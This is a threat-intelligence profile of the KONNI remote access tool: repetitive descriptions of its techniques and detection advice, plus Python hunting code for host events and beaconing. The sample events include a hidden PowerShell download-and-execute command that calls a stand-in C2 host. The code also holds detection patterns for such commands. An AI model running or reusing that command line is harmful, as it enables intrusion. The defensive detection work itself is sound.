KONNI is a remote access tool that has been used by North Korean cyber actors since at least 2014. It has significant code overlap with the NOKKI malware family and has been linked to several suspected North Korean campaigns that target political organizations in Russia, East Asia, Europe, and the Middle East. There is evidence that KONNI may be linked to APT37.

KONNI affects Windows operating systems and has used HTTP POST for C2. It has used PowerShell to download and execute a specific 64-bit version of the malware, and can take screenshots of the victim's machine. It has also duplicated the token of a high-integrity process to spawn an instance of cmd.exe under an impersonated user.

KONNI has been delivered via spearphishing campaigns through a malicious Word document. It is heavily obfuscated and includes encrypted configuration files.
KONNI Malware Capabilities
KONNI is malware whose operators may use a number of techniques to avoid detection and escalate privileges, including software packing, virtual machine software protection, and symmetric encryption. KONNI may also transfer tools or files from an external system into a compromised environment, and may attempt to get information about running processes on a system.

KONNI may attempt to evade detection and analysis by encrypting or obfuscating files and communications. It may also abuse legitimate applications to execute malicious code, and collect data from the clipboard. Additionally, KONNI may create shortcuts to run programs on system startup, and may be delivered via spearphishing emails with malicious attachments.

KONNI may steal data by exfiltrating it over an existing command and control channel, and may abuse the Windows command shell for execution. It may also bypass UAC mechanisms to elevate process privileges on a system, and may establish persistence by executing malicious content triggered by hijacked references to Component Object Model objects. KONNI may also delete files left behind by its actions, and may attempt to identify the primary user, the currently logged-in user, or the set of users that commonly use a system.

KONNI may be used to gain access to a system and steal data. It may add a program to a startup folder or reference it with a Registry run key in order to achieve persistence. It may also log user keystrokes in order to capture credentials. Additionally, KONNI may exfiltrate data over an unencrypted network protocol or to an alternate network location.
- The malware known as KONNI may use application layer protocols associated with web traffic in order to avoid detection and network filtering. Additionally, KONNI may abuse PowerShell commands and scripts for execution in order to perform various actions, such as discovery of information and execution of code. Furthermore, KONNI may attempt to take screen captures of the desktop in order to gather information during its operations.
- The Konni malware may use various methods to evade detection and escalate privileges, including software packing, virtual machine software protection, and symmetric encryption. These methods may be used to conceal command and control traffic and avoid signature-based detection.
- The KONNI malware may transfer tools or files from an external system into a compromised environment. It may also attempt to get information about running processes on a system. KONNI may use this information to determine which systems to infect and what actions to take. Additionally, KONNI may interact with the Windows Registry to hide configuration information or remove information as part of cleanup.
- KONNI may steal data by exfiltrating it over an existing command and control channel, and may abuse the Windows command shell for execution. Additionally, KONNI may enumerate files and directories or search specific locations of a host or network share for certain information within a file system.
- KONNI is a malware that may be used to elevate process privileges on a system in order to perform a task under administrator-level permissions. Additionally, KONNI may use obfuscated files or information to hide its tracks, and may also establish persistence by executing malicious content triggered by hijacked references to Component Object Model objects.
- KONNI may collect information about users on a system in order to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions. Data may be compressed and/or encrypted prior to exfiltration in order to obfuscate it and make exfiltration less conspicuous.
- The KONNI malware may use various techniques to achieve persistence and evade detection, including creating and modifying Windows services, spoofing parent process identifiers, and logging user keystrokes. These activities could be used to gain new access opportunities and intercept credentials.
- KONNI may use several methods to gain persistence on a system, including adding a program to a startup folder or referencing it with a Registry run key. It may also steal data by exfiltrating it over an unencrypted network protocol. An adversary may rely upon a user opening a malicious file in order to gain execution.
- KONNI may interact with the native OS application programming interface to execute behaviors.
- KONNI may give tasks or services names that are similar or identical to those of legitimate ones.
- KONNI may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control information can be encoded using a standard data encoding system that adheres to existing protocol specifications.
- KONNI activity can be detected by analyzing network data for unusual data flows and by monitoring for screen capture behavior.
- The KONNI malware attack can be mitigated in several ways, including by auditing command-line activity for use of the runas command or similar artifacts, scanning for known software packers or packing artifacts, and, where the symmetric key can be recovered, decrypting network traffic to look for malware communication signatures.
- The KONNI malware attack can be mitigated by monitoring for file creation and transfer, system and network discovery, and modifications to the registry. These changes could include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
- The Konni malware attack can be mitigated by collecting file hashes, monitoring file activity, and monitoring for events associated with scripting execution. These measures can help to detect and prevent the malware from causing damage to a system.
- The Konni malware attack can be mitigated by using process monitoring to monitor the execution and arguments of rundll32.exe. This will allow you to compare recent invocations of rundll32.exe with prior history and identify any potential anomalies. Additionally, network intrusion detection systems and email gateways can be used to detect and block any spearphishing attempts with malicious attachments in transit.
- The KONNI malware attack can be mitigated by detecting the file obfuscation process, or by monitoring processes and command-line arguments for actions that could lead to data collection. Additionally, data may be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
- The KONNI malware can be mitigated by analyzing network data for unusual patterns, restricting the use of scripts on systems, and monitoring system and network activity for suspicious behavior. Taking these steps can help to prevent or at least detect attacks using this malware.
- The KONNI malware can be mitigated by detecting and monitoring process API calls and loaded DLLs for unusual behavior, as well as by collecting scripts and system utilities for analysis. Additionally, COM hijacking can be detected by searching for replaced Registry references and anomalous Registry entries.
- The KONNI malware attack can be mitigated in several ways. First, it is important to monitor for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove. Additionally, system and network discovery techniques should be used to detect data and events that could lead to other malicious activities. Finally, archival software and archived files can be detected through process monitoring and monitoring for command-line arguments for known archival utilities.
- The Konni malware attack can be mitigated by monitoring processes and command-line arguments for actions that could create or modify services, collecting service utility execution and service binary path arguments used for analysis, and looking for inconsistencies between the various fields that store PPID information. Keyloggers may take many forms, but common indicators of keylogging activity include changes to the Registry and file system, driver installs, and API calls such as `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.
- The Konni malware can be used to gain initial access to a system and then persist on that system. It can be mitigated by monitoring the system for changes, such as new programs or changes to the run keys in the Registry. Network data should also be monitored for suspicious activity.
- The KONNI malware attack can be mitigated by identifying web browser files that contain credentials, monitoring file read events of web browser files, and monitoring process execution logs. System and network discovery techniques can help to identify potential malicious activity. API monitoring can also be used to help identify malicious behavior.
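As an added example (not code from the page or from any KONNI report), the following Python hunting rules implement the host-side checks the list above describes, run over constructed Sysmon-style process and registry events: an Office application spawning PowerShell with a download-and-execute command line, rundll32.exe loading a DLL from a user-writable directory, Registry Run-key persistence, and COM hijacking through per-user InprocServer32 registrations. The event field names, the sample events, the CLSID and the paths are assumptions.

```python
import re

# Rules derived from the detections listed on the page; patterns and field names are assumptions.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|users\\public|programdata)\\", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\\", re.I)
# A per-user CLSID registration shadows the HKLM entry for the same CLSID (COM hijacking).
COM_INPROC = re.compile(r"^hkcu\\software\\classes\\clsid\\\{[0-9a-f-]+\}\\inprocserver32", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def hunt(events):
    """Return (rule_name, event_index) pairs for every event that matches a rule."""
    findings = []
    for i, ev in enumerate(events):
        if ev["type"] == "process":
            parent, image, cmd = basename(ev["parent_image"]), basename(ev["image"]), ev["cmdline"]
            if parent in OFFICE_APPS and image == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd):
                findings.append(("office-spawned PowerShell download/execute", i))
            if image == "rundll32.exe" and USER_WRITABLE.search(cmd):
                findings.append(("rundll32 loading DLL from user-writable path", i))
        elif ev["type"] == "registry":
            if RUN_KEY.search(ev["key"]):
                findings.append(("Run-key persistence", i))
            if COM_INPROC.match(ev["key"]):
                findings.append(("COM hijack via HKCU InprocServer32", i))
    return findings

# Constructed sample telemetry (not real events); the CLSID, host and paths are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://c2.example.invalid/x64.ps1')\""},
    {"type": "process", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\svc.dll,Run"},
    {"type": "process", "parent_image": "C:\\Windows\\explorer.exe",  # benign control event
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe"},
    {"type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "value": "C:\\Users\\alice\\AppData\\Roaming\\updater.exe"},
    {"type": "registry",
     "key": "HKCU\\Software\\Classes\\CLSID\\{00000000-0000-0000-0000-000000000000}\\InprocServer32",
     "value": "C:\\Users\\alice\\AppData\\Local\\Temp\\shim.dll"},
]

print(hunt(SAMPLE_EVENTS))
```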
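As an added example (not from the page or any KONNI analysis), this Python check implements the network side of the list above, analyzing constructed proxy log lines for the traits the page attributes to KONNI's command and control: repeated HTTP POSTs to one host at a near-fixed interval whose bodies are standard base64. The log format, the hostnames and the jitter and encoding thresholds are assumptions.

```python
import base64
import binascii
import statistics
from collections import defaultdict

# Constructed proxy log, one record per line: epoch,src,method,host,body (not real traffic).
PROXY_LOG = """\
1700000000,10.0.0.5,POST,c2.example.invalid,SGVsbG8gZnJvbSBob3N0
1700000060,10.0.0.5,POST,c2.example.invalid,U3RpbGwgaGVyZQ==
1700000121,10.0.0.5,POST,c2.example.invalid,VXBsb2FkIGRvbmU=
1700000180,10.0.0.5,POST,c2.example.invalid,QmVhY29u
1700000015,10.0.0.5,POST,www.example.invalid,name=alice&q=hello
1700000900,10.0.0.5,POST,www.example.invalid,name=alice&q=again
1700000450,10.0.0.5,GET,www.example.invalid,
"""

def is_base64(body):
    """True when the body is strict standard base64 (the page's 'standard data encoding')."""
    try:
        base64.b64decode(body, validate=True)
        return bool(body)
    except (binascii.Error, ValueError):
        return False

def find_beacons(log, min_posts=3, max_jitter=0.2, min_encoded=0.8):
    """Flag (src, host) pairs whose POSTs recur at near-fixed intervals with encoded bodies.

    max_jitter bounds stddev/mean of the inter-arrival gaps; all thresholds are assumptions.
    """
    posts = defaultdict(list)
    for line in log.splitlines():
        ts, src, method, host, body = line.split(",", 4)
        if method == "POST":
            posts[(src, host)].append((int(ts), body))
    hits = []
    for (src, host), records in posts.items():
        if len(records) < min_posts:
            continue  # too few samples to judge periodicity
        records.sort()
        gaps = [b[0] - a[0] for a, b in zip(records, records[1:])]
        mean = statistics.mean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean else float("inf")
        encoded = sum(is_base64(body) for _, body in records) / len(records)
        if jitter <= max_jitter and encoded >= min_encoded:
            hits.append({"src": src, "host": host, "interval_s": round(mean),
                         "jitter": round(jitter, 3), "encoded_ratio": encoded})
    return hits
```

The benign form posts to www.example.invalid fail both the encoding and the sample-count checks, so only the 60-second base64 sequence to c2.example.invalid is reported.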